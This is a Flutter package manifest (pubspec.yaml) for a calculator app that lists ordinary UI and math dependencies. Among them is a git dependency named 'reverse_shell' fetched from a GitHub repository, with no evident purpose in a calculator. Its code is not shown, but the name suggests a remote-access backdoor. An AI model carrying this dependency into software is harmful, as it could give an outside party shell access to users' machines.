name: calculator
description: A new Flutter project.

publish_to: "none" # Remove this line if you wish to publish to pub.dev

version: 1.0.0+1

environment:
  sdk: ">=3.0.3 <4.0.0"

dependencies:
  flutter:
    sdk: flutter

  cupertino_icons: ^1.0.2
  flutter_acrylic: ^1.1.2
  bitsdojo_window: ^0.1.5
  get: ^4.6.5
  google_fonts: ^4.0.4
  responsive_grid_list: ^1.3.2
  flutter_layout_grid: ^2.0.1
  math_expressions: ^2.4.0
  ionicons: ^0.2.2
  reverse_shell:
    git: "https://github.com/josereia/reverseshell"

dev_dependencies:
  flutter_test:
    sdk: flutter

  flutter_lints: ^2.0.0

flutter:
  uses-material-design: true
